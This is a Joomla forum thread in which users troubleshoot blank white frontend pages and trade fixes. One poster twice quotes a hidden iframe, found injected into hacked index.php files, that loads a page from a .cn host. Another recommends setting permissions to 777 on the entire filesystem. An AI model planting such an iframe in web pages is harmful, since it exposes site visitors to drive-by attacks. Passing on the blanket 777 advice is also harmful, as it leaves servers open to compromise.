Blank / White Screen in frontend

Need help installing Joomla!? For all Joomla! installation issues please use this forum.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
bwsworld
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Sep 17, 2007 11:54 am

Blank / White Screen in frontend

Postby bwsworld » Mon Apr 14, 2008 12:24 am

Hi
When I go to my website all I see is a blank white screen. None of the pages on the front end work but I can login to the back end and make changes and navigate around. Some of the components are showing parse errors when I try to view them. I am using version 1.15 and I have not load any new mambots or modules in several weeks. I have also read through most of the forum topics with issues similar to mine and none of the fixes worked for me. Here is a link to the site http://www.discoverpoint.org. any help would be appreciated

nungster
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Mon May 12, 2008 6:14 pm

Re: Blank / White Screen in frontend

Postby nungster » Mon May 12, 2008 6:16 pm

How did you fix it?

datto510
Joomla! Intern
Joomla! Intern
Posts: 50
Joined: Wed Apr 26, 2006 10:48 pm

Re: Blank / White Screen in frontend

Postby datto510 » Mon Jul 14, 2008 6:48 pm

I have had this problem appear as well.

nungster
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Mon May 12, 2008 6:14 pm

Re: Blank / White Screen in frontend

Postby nungster » Mon Jul 14, 2008 9:26 pm

I fixed my issue by downloading a new copy of the distribution and deploying it. My guess is there were some corrupt file(s) because nothing else was done to get it to work.

WilliamL
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Sun Nov 18, 2007 4:54 am

Re: Blank / White Screen in frontend

Postby WilliamL » Sun Aug 03, 2008 6:41 am

So you had to redo your entire site?

nungster
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Mon May 12, 2008 6:14 pm

Re: Blank / White Screen in frontend

Postby nungster » Mon Aug 04, 2008 7:52 pm

I replaced the site with the entire distribution since I did not feel like looking for the corrupt file(s).

Since I did not modify any actual Joomla code, this did not interefere with any content I may of had. content is stored in the database; which was in good shape.

tdigs
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Fri Mar 20, 2009 11:58 am

Re: Blank / White Screen in frontend

Postby tdigs » Fri Mar 20, 2009 12:05 pm

I recently ran into this problem of the Blank/White Screen for both my frontend and backend Joomla site and I viewed the index.php files in the Joomla root and Joomla administrator folder and the both had the line below at the bottom line:

<html><body><iframe src="http://homenameregistration.cn/in.cgi?income11" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

I have no clue how that got there but after I removed it on both index.php files the site was back to normal.

I hope that helps,
TDigs

tdigs
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Fri Mar 20, 2009 11:58 am

Re: Blank / White Screen in frontend

Postby tdigs » Tue Apr 14, 2009 3:38 pm

It turns out that my site was hacked and that code: <html><body><iframe src="http://homenameregistration.cn/in.cgi?income11" width=1 height=1 style="visibility: hidden"></iframe></body></html>> was used to spoof anyone who visited the site. It was hacked through a Joomla 1.5.9 exploit. See link below:

http://www.webmasterworld.com/webmaster/3441472.htm

- Tdigs

JamesJo
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Fri Aug 26, 2011 12:21 pm

Re: Blank / White Screen in frontend

Postby JamesJo » Fri Sep 02, 2011 6:59 am

bwsworld wrote:Hi
When I go to my website all I see is a blank white screen. None of the pages on the front end work but I can login to the back end and make changes and navigate around. Some of the components are showing parse errors when I try to view them. I am using version 1.15 and I have not load any new mambots or modules in several weeks. I have also read through most of the forum topics with issues similar to mine and none of the fixes worked for me. Here is a link to the site http://www.discoverpoint.org. any help would be appreciated

i had the similar issue. Additionally, i had a whitespace at the end of a PHP file. and i was surprised when found BOM option turned on (i remember that i turned it off).

kingemissary
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sun Nov 20, 2011 12:01 pm

Re: Blank / White Screen in frontend

Postby kingemissary » Sun Nov 20, 2011 12:11 pm

What I did was

Confirmed that I was running PHP 5.3.8 and 777d the entire filesystem. I also changed the group of the filesystem to psacln and the owner to the owner of the site or an FTP username. Then both the administrator and frontend came up.

I only knew this because I'm on a dedicated server and I had updated my OS and the OS didn't update the PHP. Thinking that it did, I was racking my brains to find the fault, so I went back to file permissions, 777d everything and it didn't come up. That global config wont work if you can't get into the administrator index.php. I could have gone into /etc/php.ini and turned on the error reporting there but chose not to. So I decided to create a file called phpinfo in the main folder and insert <?php phpinfo (); ?> . Bring up the http://mysite.blah/phpinfo.php and that gave me the version 5.1.6. So I went to upgrade it using a more detailed site because some will say go to a repository then type yum upgrade and job done. That was an err no because phpinfo still said version 5.1.6. So the more detailed site said, go to another repository, type yum upgrade, mv this file to that, move that file to something else and then it worked. As phpinfo then changed to 5.3.6. Rechecked the joomla site and it all came up.

boizan
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 159
Joined: Mon Sep 14, 2009 11:18 pm

Re: Blank / White Screen in frontend

Postby boizan » Sat Mar 03, 2012 11:45 pm

Hello There,
I have the same problem, white screen front end, but backend is okay. I found out now that the index.php is completely empty (It is a blank page.). How can I create a new index.php?
Regards,

boizan
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 159
Joined: Mon Sep 14, 2009 11:18 pm

Re: Blank / White Screen in frontend

Postby boizan » Sat Mar 03, 2012 11:50 pm

boizan wrote:Hello There,
I have the same problem, white screen front end, but backend is okay. I found out now that the index.php is completely empty (It is a blank page.). How can I create a new index.php?
Regards,


I fixed the problem! I copied the index.php of another website.
It is working okay now!

rezap
Joomla! Apprentice
Joomla! Apprentice
Posts: 7
Joined: Thu Dec 13, 2012 9:57 am

Re: Blank / White Screen in frontend

Postby rezap » Tue Dec 18, 2012 11:18 am

I transfer the existing website from server to localhost and i changed configuration.php with local database connection. Now the frontend works good, but the administrator screen appears blank.

Please advise me.

Thanks

User avatar
Azamkl
Joomla! Apprentice
Joomla! Apprentice
Posts: 28
Joined: Sat Mar 25, 2006 2:43 am
Location: Malaysia
Contact:

Re: Blank / White Screen in frontend

Postby Azamkl » Sun Mar 10, 2013 4:27 pm

This happen to me too. I realize it after upgrading my Joomla and Virtuemart. All of the sudden, my frontpage were giving me a white blank page.

I've look into the index.php and index.html. Everything is ok inside the source code. Can't figure out what exactly happen, I have deleted the 'index.html' and leave the 'index.php' on my server and everything back to normal.
~Engrave the Creativity~

Chicolondres
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Fri Aug 06, 2010 12:39 pm

Re: Blank / White Screen in frontend

Postby Chicolondres » Tue May 07, 2013 5:35 pm

Overwriting the index.php with one from another Joomla 1.5 site, together with resetting permissions for everything, solved the problem for me, and I only thought it right to post accordingly. Thanks everyone. Note: I had the same problem on the backend, too.

petercoia
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Nov 10, 2014 2:51 am

Re: Blank / White Screen in frontend

Postby petercoia » Fri Nov 14, 2014 10:14 am

If you have access to your control panel, before you do anything go to - Control Panel - Advanced - Process Manager - and stop all running processes, as an overload here is a common cause of the WSOD among novice users (like me).
Hope this helps.

User avatar
dbflyboy917
Joomla! Intern
Joomla! Intern
Posts: 59
Joined: Sun Aug 08, 2010 5:31 am
Location: Jupiter

Re: Blank / White Screen in frontend

Postby dbflyboy917 » Fri Jan 30, 2015 3:27 pm

I have checked my Index.php file and from what I can see (I don't know anything about website code), the page looks fine in code. It's not blank, like some have mentioned here, so I'm not sure what to do. My page is still blank, and I've even added 'index.php' at the end of the URL, no luck. Thanks.

I have Joomla 2.5
Thanks for the help!

Best Regards,
dbflyboy917

Gilroy
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Wed Apr 06, 2016 9:20 am

Re: Blank / White Screen in frontend

Postby Gilroy » Wed Apr 06, 2016 9:25 am

Hi, I wonder if you can help. I am having the same problem and note this thread is quite old - are there any other fixes to stop this white screen happening or do I need to uninstall and start again.

Thank you

Gilroy
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Wed Apr 06, 2016 9:20 am

Re: Blank / White Screen in frontend

Postby Gilroy » Wed Apr 06, 2016 9:45 am

Hi Satnag29 = thank you for your email. Any chance you can post the fix on here - appreciate your help

memo93
Joomla! Apprentice
Joomla! Apprentice
Posts: 11
Joined: Mon Feb 22, 2016 11:23 am

Re: Blank / White Screen in frontend

Postby memo93 » Wed Apr 06, 2016 12:52 pm

hey...i had the same problem but actually this is the first time i see this website because im new to this job thus i don't know if the joomla code is modified or know what shall i do to fix the website without losing the content?!


Return to “Installation - 1.0.x”

Who is online

Users browsing this forum: No registered users and 7 guests